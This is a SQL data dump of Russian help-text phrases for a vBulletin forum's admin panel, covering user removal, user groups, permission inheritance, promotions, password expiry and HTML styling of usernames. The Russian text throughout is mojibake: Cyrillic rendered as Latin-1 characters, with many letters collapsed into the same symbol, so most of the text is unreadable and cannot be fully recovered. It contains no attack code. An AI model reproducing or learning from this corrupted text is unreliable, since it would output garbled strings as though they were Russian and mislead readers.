(24468, -1, 'user_pruneusers_text', 'cphelptext', 'Ãèæå âû âèäèòå ñïèñîê ïîëüçîâà òåëåé, ñîîòâåòñòâóþùèõ çà äà ÃÃûì ïà ðà ìåòðà ì ïîèñêà . Òåïåðü âû ìîæåòå óäà ëÿòü èëè ïåðåìåùà òü ïîëüçîâà òåëåé. Îòìåòüòå ôëà æêà ìè òåõ ïîëüçîâà òåëåé, ñ êîòîðûì âû æåëà åòå ïðîèçâåñòè äåéñòâèå, çà òåì Ãèæå âûáåðèòå äåéñòâèå (\"Óäà ëèòü\" èëè \"Ãåðåìåñòèòü\"). Åñëè âû âûáðà ëè \"Ãåðåìåñòèòü\", óáåäèòåñü, ÷òî âû âûáðà ëè ãðóïïó ïîëüçîâà òåëåé, â êîòîðóþ òðåáóåòñÿ ïåðåìåñòèòü óêà çà ÃÃûõ ïîëüçîâà òåëåé. Ãà æìèòå Ãèæå êÃîïêó \"Âïåð¸ä\", ÷òîáû ïðîèçâåñòè âûáðà ÃÃîå äåéñòâèå.', 'vbulletin', '', 0, ''),
(24469, -1, 'user_pruneusers_title', 'cphelptext', 'Óäà ëåÃèå/ïåðåìåùåÃèå ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24470, -1, 'user_remove_text', 'cphelptext', 'Ãà æìèòå Ãèæå êÃîïêó \"Äà \" äëÿ óäà ëåÃèÿ ïîëüçîâà òåëÿ. Åñëè âû æåëà åòå óäà ëèòü ñîîáùåÃèÿ, ëè÷Ãûå ñîîáùåÃèÿ è ò.ä. ýòîãî ïîëüçîâà òåëÿ, Ãåîáõîäèìî ñäåëà òü ýòî ÄÎ óäà ëåÃèÿ ïîëüçîâà òåëÿ.', 'vbulletin', '', 0, ''),
(24471, -1, 'user_remove_title', 'cphelptext', 'Óäà ëèòü ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24472, -1, 'usergroup_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃðóïïû ïîëüçîâà òåëåé \r\nÃðà âà â ðà çäåëà õ \r\nÃðà âà à äìèÃèñòðà òîðà \r\nÃðóïïû ïîëüçîâà òåëåé: \r\nÑèñòåìà ãðóïï ïîëüçîâà òåëåé ôîðóìà , êà ê ëþáà ÿ äðóãà ÿ ñèñòåìà ãðóïï ïîëüçîâà òåëåé, èñïîëüçóåòñÿ äëÿ óïðà âëåÃèÿ ïðà âà ìè äîñòóïà ôîðóìà . Âû ìîæåòå óïðà âëÿòü ïðà âà ìè äîñòóïà ïóò¸ì îðãà Ãèçà öèè ïîëüçîâà òåëåé â ãðóïïû è óñòà Ãîâêè ðà çðåøåÃèé äëÿ ýòèõ ãðóïï. Êðîìå òîãî, ïîëüçîâà òåëè ìîãóò ïðèÃà äëåæà òü Ãåñêîëüêèì ãðóïïà ì, îòïðà âëÿòü çà ÿâêè Ãà âñòóïëåÃèå â äðóãèå ãðóïïû.  äîïîëÃÃ¥Ãèå ê ýòîìó, ôîðóì ïîçâîëÿåò óñòà Ãà âëèâà òü ïîâûøåÃèÿ äëÿ ãðóïïû, ÷òîáû à âòîìà òè÷åñêè ìåÃÿòü ÷ëåÃñòâî â ãðóïïà õ ïðè âûïîëÃÃ¥Ãèè Ãåêîòîðûõ óñëîâèé. \r\n Ãðà âà äîñòóïà ãðóïïû ïîëüçîâà òåëåé èìåþò äâà óðîâÃÿ: ïåðâûé - ýòî ïðà âà äîñòóïà ïîëüçîâà òåëüñêèõ ãðóïï, êîòîðûå óñòà Ãà âëèâà þòñÿ â óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé . Ãî óìîë÷à Ãèþ, ïîëüçîâà òåëü áóäåò èìåòü ýòè ðà çðåøåÃèÿ âî âñåõ ðà çäåëà õ. Åñëè âû õîòèòå óñòà Ãîâèòü îñîáûå ïðà âà äëÿ ãðóïïû â êîÃêðåòÃîì ðà çäåëå, âû ìîæåòå ñäåëà òü ýòî, óñòà Ãîâèâ îñîáûå ïðà âà äîñòóïà äëÿ êà æäîãî ðà çäåëà Ãà ñòðà Ãèöå Ãðà âà â ðà çäåëà õ . Ñòðà Ãèöà Ãðà âà êà ëåÃäà ðÿ ïðåäîñòà âëÿåò ñõîäÃûå âîçìîæÃîñòè äëÿ êà ëåÃäà ðåé. \r\n Ãîëüçîâà òåëè ìîãóò ïðèÃà äëåæà òü Ãåñêîëüêèì ãðóïïà ì. Åñòü äâà òèïà ïîëüçîâà òåëüñêèõ ãðóïï: îñÃîâÃà ÿ è äîïîëÃèòåëüÃà ÿ. Ãîëüçîâà òåëü ìîæåò ïðèÃà äëåæà òü òîëüêî ê îäÃîé îñÃîâÃîé ãðóïïå, Ãî ìîæåò ïðèÃà äëåæà òü ê Ãåñêîëüêèì äîïîëÃèòåëüÃûì. ÎñÃîâÃà ÿ ãðóïïà îïðåäåëÿåò áà çîâûå ïðà âà äîñòóïà ôîðóìà ; êà ê ìèÃèìóì, ïîëüçîâà òåëü âñåãäà áóäåò èìåòü ïðà âà â ðà çäåëà õ, óñòà ÃîâëåÃÃûå äëÿ îñÃîâÃîé ãðóïïû, ê êîòîðîé îà ïðèÃà äëåæèò. ÄîïîëÃèòåëüÃûå ãðóïïû ìîãóò áûòü èñïîëüçîâà Ãû äëÿ ïðåäîñòà âëåÃèÿ äîïîëÃèòåëüÃûõ âîçìîæÃîñòåé, êîòîðûå ÃÃ¥ ïðåäîñòà âëÿþòñÿ âñåì ïîëüçîâà òåëÿì îñÃîâÃîé ãðóïïû. \r\n ×òîáû äîïîëÃèòåëüÃûå ãðóïïû âëèÿëè Ãà ðà çðåøåÃèÿ ïîëüçîâà òåëåé (ïðè âñòóïëåÃèè â Ãèõ), Ãåîáõîäèìî, ÷òîáû â îñÃîâÃîé ãðóïïå òà êèõ ïîëüçîâà òåëåé îïöèÿ \"Ãà çðåøèòü ðà ñøèðåÃèå ïðà â äîñòóïà \" áûëà âêëþ÷åÃà . Ñì. Óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé . Âîîáùå ñèñòåìû ïðà â äîñòóïà îñÃîâÃîé è äîïîëÃèòåëüÃûõ ãðóïï ñîâìåùà þòñÿ ïî ïðèÃöèïó \"äà òü ìà êñèìà ëüÃûå ïðà âà \". Ãà ïðèìåð, åñëè äëÿ îñÃîâÃîé ãðóïïû ïîëüçîâà òåëÿ îïöèÿ \"Ìîæåò ïðîñìà òðèâà òü ðà çäåë\" óñòà ÃîâëåÃà â \"Ãåò\", à äëÿ îäÃîé èç äîïîëÃèòåëüÃûõ ãðóïï, êóäà âõîäèò ýòîò ïîëüçîâà òåëü, òà æå îïöèÿ óñòà ÃîâëåÃà â \"Äà \", ðåçóëüòèðóþùåé îïöèåé ñòà Ãåò \"Äà \". ×èñëåÃÃûå îãðà Ãè÷åÃèÿ è îïöèè äëÿ ãðóïï äåéñòâóþò òà êèì æå îáðà çîì, òîëüêî âìåñòî çÃà ÷åÃèé \"Äà \" è \"Ãåò\" äëÿ ïîëüçîâà òåëÿ ïðèìåÃÿåòñÿ îïöèÿ ñ áîëüøèì çÃà ÷åÃèåì ÷èñëà .\r\nÂîçìîæÃîñòè Ãà ñòðîåê äëÿ äîïîëÃèòåëüÃûõ ãðóïï âêëþ÷à þò ðà çðåøåÃèå äîñòóïà ê ñêðûòûì ðà çäåëà ì. Ãà ïðèìåð, îñÃîâÃà ÿ ãðóïïà ïîëüçîâà òåëÿ ìîæåò èìåòü ê äà ÃÃîìó ñêðûòîìó ðà çäåëó Ãóëåâîé äîñòóï, óñòà ÃîâëåÃÃûé â ïðà âà õ ôîðóìà . Äëÿ äîïîëÃèòåëüÃîé ãðóïïû âñå ðà çðåøåÃèÿ ìîãóò áûòü óñòà ÃîâëåÃû â \"Ãåò\" â óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé , Ãî ìîæåò áûòü óñòà ÃîâëåÃî ðà çðåøåÃèå äîñòóïà ê äà ÃÃîìó ðà çäåëó â ïðà âà õ ôîðóìà . Ãåçóëüòà òîì äîáà âëåÃèÿ ïîëüçîâà òåëÿ ê ýòîé äîïîëÃèòåëüÃîé ãðóïïå áóäåò ðà çðåøåÃèå äîñòóïà äëÿ Ãåãî ê äà ÃÃîìó ñêðûòîìó ðà çäåëó. Ãòî ãîðà çäî óäîáÃåå, ÷åì óñòà Ãà âëèâà òü ëèøÃèå ðà çðåøåÃèÿ äëÿ îñÃîâÃûõ ãðóïï. \r\n Åñëè â îñÃîâÃîé ãðóïïå îïöèÿ \"Ãà çðåøèòü ðà ñøèðåÃèå ïðà â äîñòóïà \" óñòà ÃîâëåÃà â \"Ãåò\" (ñì. Óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé ), òî ÷ëåÃñòâî â ëþáûõ äîïîëÃèòåëüÃûõ ãðóïïà õ ÃÃ¥ áóäåò ðà ñøèðÿòü ïðà âà äîñòóïà , çà äà ÃÃûå äëÿ ýòîé ãðóïïû. ÅäèÃñòâåÃÃà ÿ ïðè÷èÃà , ïî êîòîðîé ýòà îïöèÿ ìîæåò áûòü âûêëþ÷åÃà â îñÃîâÃîé ãðóïïå - åñëè äà ÃÃà ÿ ãðóïïà ÿâëÿåòñÿ ãðóïïîé çà áëîêèðîâà ÃÃûõ ïîëüçîâà òåëåé; â ýòîì ñëó÷à å ÷ëåÃñòâî â äîïîëÃèòåëüÃûõ ãðóïïà õ ÃÃ¥ äîëæÃî ðà ñøèðÿòü Ãóëåâîé äîñòóï çà áëîêèðîâà ÃÃûõ ïîëüçîâà òåëåé. \r\n Äðóãîé ôóÃêöèåé ñèñòåìû ïîëüçîâà òåëüñêèõ ãðóïï ÿâëÿåòñÿ ïðåäîñòà âëåÃèå âîçìîæÃîñòè ïîëüçîâà òåëÿì ïîñûëà òü çà ÿâêè Ãà âñòóïëåÃèå â ãðóïïû. Òà êèì îáðà çîì, ñèñòåìà ïîçâîëÿåò ïîëüçîâà òåëÿì çà ïðà øèâà òü äîïîëÃèòåëüÃûå ïðà âà äîñòóïà , ò.ê. ïðà âà äîñòóïà Ãà ôîðóìå óïðà âëÿþòñÿ ñ ïîìîùüþ ÷ëåÃñòâà â ãðóïïà õ. Ãîëüçîâà òåëè ìîãóò ïîñûëà òü çà ÿâêè Ãà âñòóïëåÃèå ñî ñòðà Ãèöû ×ëåÃñòâî â ãðóïïà õ ñâîåé ïà Ãåëè óïðà âëåÃèÿ. Ãîëüçîâà òåëè ñìîãóò ïîñëà òü çà ÿâêó Ãà âñòóïëåÃèå òîëüêî â òó ãðóïïó, ó êîòîðûõ âêëþ÷åÃà îïöèÿ \"Ãóáëè÷Ãà ÿ ãðóïïà \" â óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé . Âû ìîæåòå óïðà âëÿòü ýòèìè çà ÿâêà ìè ñî ñòðà Ãèöû Çà ÿâêè Ãà âñòóïëåÃèå .\r\nÊðîìå òîãî, â óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé âû ìîæåòå Ãà çÃà ÷èòü ëèäåðîâ ãðóïï, êîòîðûå ñìîãóò óïðà âëÿòü çà ÿâêà ìè Ãà âñòóïëåÃèå â èõ ãðóïïó (ïîäòâåðæäà òü/îòêëîÃÿòü) ñî ñòðà Ãèöû ×ëåÃñòâî â ãðóïïà õ ñâîåãî êà áèÃåòà . \r\n \r\nÄâèæîê ôîðóìà òà êæå ïîääåðæèâà åò ãðóïïîâûå ïîâûøåÃèÿ, îñÃîâûâà ÿñü Ãà Ãåêîòîðûõ óñëîâèÿõ. ÃîâûøåÃèÿ èñïîëüçóþòñÿ äëÿ à âòîìà òè÷åñêîé ñìåÃû ÷ëåÃñòâà â ãðóïïà õ ïðè äîñòèæåÃèè îïðåäåë¸ÃÃîãî óðîâÃÿ ðåïóòà öèè, ñðîêà ðåãèñòðà öèè è/èëè êîëè÷åñòâà îïóáëèêîâà ÃÃûõ ñîîáùåÃèé. ÃîâûøåÃèÿ, èñïîëüçóåìûå ñîâìåñòÃî ñ ðåïóòà öèåé ïîëüçîâà òåëÿ, ìîãóò áûòü îñîáåÃÃî ýôôåêòèâÃû (ñì. ðà çäåëû ïîìîùè ïî ðåïóòà öèè ïîëüçîâà òåëåé ). Âû ìîæåòå óïðà âëÿòü ïîâûøåÃèÿìè ñî ñòðà Ãèöû ÃîâûøåÃèÿ .', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(24473, -1, 'usergroup_title', 'cphelptext', 'Î ãðóïïà õ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24474, -1, 'usergroup_add_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ñîçäà òü Ãîâóþ ãðóïïó ïîëüçîâà òåëåé ñ ïðà âà ìè äîñòóïà , óêà çà ÃÃûì Ãèæå. Ñìîòðèòå ñïðà âêó î ïðåäîñòà âëåÃèè ïðà â äîñòóïà äëÿ ïîëó÷åÃèÿ äîïîëÃèòåëüÃîé èÃôîðìà öèè.', 'vbulletin', '', 0, ''),
(24475, -1, 'usergroup_add_title', 'cphelptext', 'Äîáà âèòü Ãîâóþ ãðóïïó', 'vbulletin', '', 0, ''),
(24476, -1, 'usergroup_add_ugid_base_text', 'cphelptext', 'Ñ ïîìîùüþ ýòîãî ïà ðà ìåòðà âû ìîæåòå áûñòðî óêà çà òü Ãîâîé ãðóïïå ïðà âà â ðà çäåëà õ, îñÃîâûâà ÿñü Ãà îäÃîé èç ñóùåñòâóþùèõ. Ãòî î÷åÃü óäîáÃî, êîãäà Ãîâà ÿ ãðóïïà ïîëüçîâà òåëåé ÃÃ¥ äîëæÃà èìåòü ïðà â êî âñåì ðà çäåëà ì.', 'vbulletin', 'zCarot', 1214998438, '3.8.0 Alpha 1'),
(24477, -1, 'usergroup_add_ugid_base_title', 'cphelptext', 'Ñîçäà òü ïðà âà , îñÃîâûâà ÿñü Ãà ñóùåñòâóþùèõ äëÿ ãðóïïû ïîëüçîâà òåëåé', 'vbulletin', 'zCarot', 1200353630, '3.7.0 Beta 4'),
(24478, -1, 'usergroup_add_edit_cananimateavatar_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè ýòîé ãðóïïû çà ãðóæà òü à Ãèìèðîâà ÃÃûå GIF à âà òà ðû.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24479, -1, 'usergroup_add_edit_cananimateavatar_title', 'cphelptext', 'Ìîæåò çà ãðóæà òü à Ãèìèðîâà ÃÃûé à âà òà ð', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24480, -1, 'usergroup_add_edit_cananimateprofilepic_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè ýòîé ãðóïïû çà ãðóæà òü à Ãèìèðîâà ÃÃûå GIF ôîòîãðà ôèè.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24481, -1, 'usergroup_add_edit_cananimateprofilepic_title', 'cphelptext', 'Ìîæåò çà ãðóæà òü à Ãèìèðîâà ÃÃóþ ôîòîãðà ôèþ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24482, -1, 'usergroup_edit_canemailmember_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè ýòîé ãðóïïû îòïðà âëÿòü ýëåêòðîÃÃûå ïèñüìà äðóãèì ïîëüçîâà òåëÿì ÷åðåç ôîðóì. Ãà âà øåì ôîðóìå äîëæÃà áûòü âêëþ÷åÃà ôóÃêöèÿ îòïðà âêè ýëåêòðîÃÃûõ ïèñåì. À òà êæå ó÷òèòå, ÷òî ïîëüçîâà òåëü ìîæåò âûêëþ÷èòü ïðè¸ì ýëåêòðîÃÃûõ ïèñåì ñîîáùåÃèé îò äðóãèõ ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1145033153, '3.6.0 Beta 1'),
(24483, -1, 'usergroup_edit_canemailmember_title', 'cphelptext', 'Ìîæåò îòïðà âëÿòü ýëåêòðîÃÃûå ïèñüìà ïîëüçîâà òåëÿì', 'vbulletin', 'zCarot', 1145033153, '3.6.0 Beta 1'),
(24484, -1, 'usergroup_edit_cangivearbinfraction_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè ýòîé ãðóïïû óñòà Ãà âëèâà òü ñîáñòâåÃÃûå îïèñà Ãèÿ Ãà ðóøåÃèÿ, áà ëëû Ãà ðóøåÃèé è äà òó èñòå÷åÃèÿ. Ãîëüçîâà òåëü äîëæåà òà êæå èìåòü ïðà âà \"äåëà òü çà ïèñè î Ãà ðóøåÃèÿõ\".', 'vbulletin', 'zCarot', 1149889255, '3.6.0 Beta 2'),
(24485, -1, 'usergroup_edit_cangivearbinfraction_title', 'cphelptext', 'Ìîæåò óñòà Ãà âëèâà òü ïðîèçâîëüÃîå çÃà ÷åÃèå Ãà ðóøåÃèé', 'vbulletin', 'zCarot', 1149889255, '3.6.0 Beta 2'),
(24486, -1, 'usergroup_add_edit_cansearchft_bool_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè ýòîé ãðóïïû èñïîëüçîâà òü ëîãè÷åñêèé ïîèñê Ãà âà øåì ôîðóìå. Ãòà îïöèÿ áóäåò ðà áîòà òü, òîëüêî åñëè âû âûáðà ëè â êà ÷åñòâå òèïà ïîèñêà Fulltext. Ëîãè÷åñêèé ïîèñê ïîçâîëÿåò èñïîëüçîâà òü êëþ÷åâûå ñëîâà AND (è), OR (èëè) è/èëè NOT (ÃÃ¥) äëÿ áîëåå êîððåêòÃîãî ïîèñêà . Ãà áîëüøèõ ôîðóìà õ ýòî ìîæåò äà âà òü áîëüøóþ Ãà ãðóçêó Ãà ñåðâåð, ïîýòîìó âà ì ñëåäóåò ó÷èòûâà òü ýòî. Åñëè âû âûêëþ÷èòå ýòó îïöèþ, òî ïîèñê Fulltext áóäåò äà âà òü ìåÃüøå Ãà ãðóçêè, ÷åì îáû÷Ãûé. Äëÿ ðà áîòû ýòîé îïöèè âû äîëæÃû âêëþ÷èòü ïîèñêîâóþ ñèñòåìó ôîðóìà â âà øèõ îñÃîâÃûõ Ãà ñòðîéêà õ è äà ÃÃà ÿ ãðóïïà ïîëüçîâà òåëåé äîëæÃà èìåòü ïðà âà ïîèñêà ïî ôîðóìó.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24487, -1, 'usergroup_add_edit_cansearchft_bool_title', 'cphelptext', 'Ìîæåò èñïîëüçîâà òü ëîãè÷åñêèé ïîèñê', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24488, -1, 'usergroup_add_edit_canusefriends_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò èñïîëüçîâà òü ôóÃêöèþ \"Äðóçüÿ\" Ãà ôîðóìå (åñëè ýòà ôóÃêöèÿ âêëþ÷åÃà ãëîáà ëüÃî)', 'vbulletin', 'zCarot', 1199282335, '3.7.0 Beta 4'),
(24489, -1, 'usergroup_add_edit_canusefriends_title', 'cphelptext', 'Ìîæåò èñïîëüçîâà òü ñïèñîê äðóçåé', 'vbulletin', 'zCarot', 1199282335, '3.7.0 Beta 4'),
(24490, -1, 'usergroup_add_edit_canviewthreads_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûêëþ÷åÃà , òî ïîëüçîâà òåëè ýòîé ãðóïïû ÃÃ¥ ñìîãóò ïðîñìà òðèâà òü ñîäåðæèìîå òåì. Ãòî ìîæåò èñïîëüçîâà òüñÿ äëÿ òîãî, ÷òîáû ëþäè âèäåëè, ÷òî îÃè ñìîãóò ïîëó÷èòü, èìåÿ áîëåå ïîëÃûå ïðà âà .', 'vbulletin', 'zCarot', 1197643100, '3.7.0 Beta 2'),
(24491, -1, 'usergroup_add_edit_canviewthreads_title', 'cphelptext', 'Ìîæåò ñìîòðåòü ñîäåðæèìîå òåì', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24492, -1, 'usergroup_add_edit_isnotmoderated_text', 'cphelptext', 'Ãðîâåðêà ñîáûòèé êà ëåÃäà ðÿ ìîæåò áûòü âêëþ÷åÃà ïðè ðåäà êòèðîâà Ãèè Ãà ñòðîåê êà ëåÃäà ðÿ. Äà ÃÃà ÿ îïöèÿ îïðåäåëÿåò, ñëåäóåò ëè ñäåëà òü èñêëþ÷åÃèå äëÿ ýòîé ãðóïïû ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1155823343, '3.6.1'),
(24493, -1, 'usergroup_add_edit_isnotmoderated_title', 'cphelptext', 'Ñîáûòèÿ ÃÃ¥ ïðîâåðÿþòñÿ', 'vbulletin', 'zCarot', 1155823343, '3.6.1'),
(24494, -1, 'usergroup_add_edit_title_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå ãðóïïû ïîëüçîâà òåëåé. ÃŽÃî èñïîëüçóåòñÿ äëÿ èäåÃòèôèêà öèè ýòîé ãðóïïû Ãà ôîðóìå è â óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(24495, -1, 'usergroup_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(24496, -1, 'usergroup_add_edit_description_text', 'cphelptext', 'Ââåäèòå îïèñà Ãèå äëÿ ýòîé ãðóïïû ïîëüçîâà òåëåé. Ãà ïðèìåð, åñëè ýòà ãðóïïà èñïîëüçóåòñÿ äëÿ ïîëó÷åÃèÿ äîïîëÃèòåëüÃûõ ïîëÃîìî÷èé, çäåñü âû ìîæåòå îïèñà òü èõ.', 'vbulletin', '', 0, ''),
(24497, -1, 'usergroup_add_edit_description_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', '', 0, ''),
(24498, -1, 'usergroup_add_edit_usertitle_text', 'cphelptext', 'Åñëè âû õîòèòå, ÷òîáû ïîëüçîâà òåëè (÷ëåÃû ýòîé ãðóïïû) èìåëè îñîáûé ñòà òóñ, âû ìîæåòå óêà çà òü ýòîò ñòà òóñ çäåñü. Îà áóäåò îòîáðà æà òüñÿ â ïðîôèëå ïîëüçîâà òåëÿ, åãî ñîîáùåÃèÿõ è ò.ä.', 'vbulletin', '', 0, ''),
(24499, -1, 'usergroup_add_edit_usertitle_title', 'cphelptext', 'Î ïîëüçîâà òåëÿõ', 'vbulletin', '', 0, ''),
(24500, -1, 'usergroup_add_edit_htmltags_text', 'cphelptext', 'Ãåðâîå ïîëå äëÿ îòêðûâà þùåãî òåãà , âòîðîå - äëÿ çà êðûâà þùåãî. Ãòè òåãè áóäóò âñòà âëåÃû ïåðåä è ïîñëå èìåÃè ïîëüçîâà òåëÿ, ïðèìåðÃî òà ê: \r\n [îòêðûâà þùèé òåã]èìÿ_ïîëüçîâà òåëÿ[çà êðûâà þùèé òåã] \r\n Ãåêîòîðûå HTML òåãè, êîòîðûå âû, âîçìîæÃî, çà õîòèòå èñïîëüçîâà òü, ïðèâåäåÃû òóò: \r\n<span style=\"font-weight: bold;\">èìÿ_ïîëüçîâà òåëÿ</span> = èìÿ_ïîëüçîâà òåëÿ \r\n<span style=\"font-style: italic;\">èìÿ_ïîëüçîâà òåëÿ</span> = èìÿ_ïîëüçîâà òåëÿ \r\n<span style=\"text-decoration: underline;\">èìÿ_ïîëüçîâà òåëÿ</span> = èìÿ_ïîëüçîâà òåëÿ \r\n<span style=\"color: red;\">èìÿ_ïîëüçîâà òåëÿ</span> = username \r\n<span style=\"font: 20px verdana;\">èìÿ_ïîëüçîâà òåëÿ</span> = èìÿ_ïîëüçîâà òåëÿ \r\n\r\nÂû òà êæå ìîæåòå ñîñòà âëÿòü êîìáèÃà öèè, èñïîëüçóÿ Ãåñêîëüêî à òðèáóòîâ ñòèëÿ: \r\n\r\n<span style=\"font: 20px verdana; color: red;\">èìÿ_ïîëüçîâà òåëÿ</span> = èìÿ_ïîëüçîâà òåëÿ ', 'vbulletin', 'zCarot', 1169465876, '3.6.5'),
(24501, -1, 'usergroup_add_edit_htmltags_title', 'cphelptext', 'HTML ðà çìåòêà èìåÃè ïîëüçîâà òåëÿ', 'vbulletin', '', 0, ''),
(24502, -1, 'usergroup_add_edit_passwordexpires_text', 'cphelptext', 'Ââåäèòå êîëè÷åñòâî äÃåé, ïî èñòå÷åÃèè êîòîðûõ ïîëüçîâà òåëè ýòîé ãðóïïû áóäóò îáÿçà Ãû ñìåÃèòü ñâîé ïà ðîëü. Ââåäèòå 0, ÷òîáû ÃÃ¥ òðåáîâà òü ñìåÃû ïà ðîëÿ.', 'vbulletin', '', 0, ''),
(24503, -1, 'usergroup_add_edit_passwordexpires_title', 'cphelptext', 'Ñðîê óñòà ðåâà Ãèÿ ïà ðîëÿ', 'vbulletin', '', 0, ''),
(24504, -1, 'usergroup_add_edit_passwordhistory_text', 'cphelptext', 'Ãà ïðèìåð, åñëè çäåñü óñòà ÃîâëåÃî 30 äÃåé è ïîëüçîâà òåëü ïûòà åòñÿ ñìåÃèòü ïà ðîëü, îà ÃÃ¥ ñìîæåò èñïîëüçîâà òü Ãèêà êèå ïà ðîëè, êîòîðûå èñïîëüçîâà ë â òå÷åÃèè ïîñëåäÃèõ 30 äÃåé. Ãòà îïöèÿ ìîæåò áûòü èñïîëüçîâà Ãà ñîâìåñòÃî ñ ïðåäûäóùåé îïöèåé äëÿ ïîâûøåÃèÿ áåçîïà ñÃîñòè.', 'vbulletin', '', 0, ''),
(24505, -1, 'usergroup_add_edit_passwordhistory_title', 'cphelptext', 'Õðà Ãèòü èñòîðèþ ïà ðîëåé', 'vbulletin', '', 0, ''),
(24506, -1, 'usergroup_add_edit_showgroup_text', 'cphelptext', 'Åñëè âû ÃÃ¥ õîòèòå, ÷òîáû ïîëüçîâà òåëè çÃà ëè, êòî ïðèÃà äëåæèò ýòîé ãðóïïå, âûêëþ÷èòå ýòó îïöèþ.', 'vbulletin', '', 0, ''),
(24507, -1, 'usergroup_add_edit_showgroup_title', 'cphelptext', 'Îòîáðà æåÃèå ÷ëåÃîâ ïðè ïðîñìîòðå ãðóïïû', 'vbulletin', '', 0, ''),
(24508, -1, 'usergroup_add_edit_showbirthday_text', 'cphelptext', '×òîáû äÃè ðîæäåÃèÿ îòîáðà æà ëèñü â êà ëåÃäà ðå, îïöèÿ \"Ãîêà çûâà òü äÃè ðîæäåÃèÿ\" äîëæÃà áûòü âêëþ÷åÃà äëÿ ýòîãî êà ëåÃäà ðÿ. Ñì. Óïðà âëåÃèå êà ëåÃäà ðÿìè . \r\n ×òîáû äÃè ðîæäåÃèÿ îòîáðà æà ëèñü Ãà ãëà âÃîé ñòðà Ãèöå ôîðóìà , Ãåîáõîäèìî âêëþ÷èòü îïöèþ \"Îòîáðà æà òü ñåãîäÃÿøÃèå äÃè ðîæäåÃèÿ\" â îñÃîâÃûõ Ãà ñòðîéêà õ .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(24509, -1, 'usergroup_add_edit_showbirthday_title', 'cphelptext', 'ÄÃè ðîæäåÃèÿ âèäèìû', 'vbulletin', '', 0, ''),
(24510, -1, 'usergroup_add_edit_showmemberlist_text', 'cphelptext', 'Ãòà îïöèÿ êà ñà åòñÿ ñïèñêà ïîëüçîâà òåëåé .  øì îòîáðà æà þòñÿ âñå ïîëüçîâà òåëè ôîðóìà . Åñëè âû âûêëþ÷èòå ýòó îïöèþ, ÷ëåÃû ýòîé ãðóïïû ÃÃ¥ áóäóò îòîáðà æà òüñÿ â ñïèñêå ïîëüçîâà òåëåé. \r\n \r\nÃîìÃèòå: Ãî óìîë÷à Ãèþ, â ñâÿçè ñ ïîâûøåÃÃîé Ãà ãðóçêîé, äîïîëÃèòåëüÃûå ãðóïïû ÃÃ¥ ìîãóò çà ìåÃÿòü çÃà ÷åÃèÿ îñÃîâÃîé. Åñëè âà ì ÃóæÃà ýòà ôóÃêöèÿ, òî äîáà âüòå ñëåäóþùóþ ñòðîêó â âà ø ôà éë includes/config.php:\r\ndefine(\'MEMBERLIST_INCLUDE_SECONDARY\', true); ', 'vbulletin', 'zCarot', 1174307144, '3.6.6'),
(24511, -1, 'usergroup_add_edit_showmemberlist_title', 'cphelptext', 'Îòîáðà æåÃèå ÷ëåÃîâ â ñïèñêå ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24512, -1, 'usergroup_add_edit_allowmembergroups_text', 'cphelptext', 'Åñëè äîïîëÃèòåëüÃà ÿ ãðóïïà êà ê-ëèáî ðà ñøèðÿåò ïðà âà îñÃîâÃîé ãðóïïû, ýòà îïöèÿ äîëæÃà áûòü óñòà ÃîâëåÃà â \"Äà \". \r\nÃðà âà äîïîëÃèòåëüÃîé ãðóïïû ÃÃ¥ áóäóò îêà çûâà òü Ãèêà êîãî âëèÿÃèÿ, åñëè ýòà îïöèÿ óñòà ÃîâëåÃà â \"Ãåò\". Ãðè÷èÃîé óñòà Ãîâêè ýòîé îïöèè â \"Ãåò\" ìîæåò ñëóæèòü òî, ÷òî ýòî ãðóïïà ïîëüçîâà òåëåé - çà áëîêèðîâà ÃÃûå, ò.Ã¥. ó÷à ñòÃèêè ÃÃ¥ äîëæÃû ïîëó÷à òü äîñòóï, Ãåñìîòðÿ Ãà Ãà õîæäåÃèå â äîïîëÃèòåëüÃîé ãðóïïå ïîëüçîâà òåëåé, êîòîðà ÿ äà åò èì äîñòóï ê ÷åìó-ëèáî.', 'vbulletin', '', 0, ''),
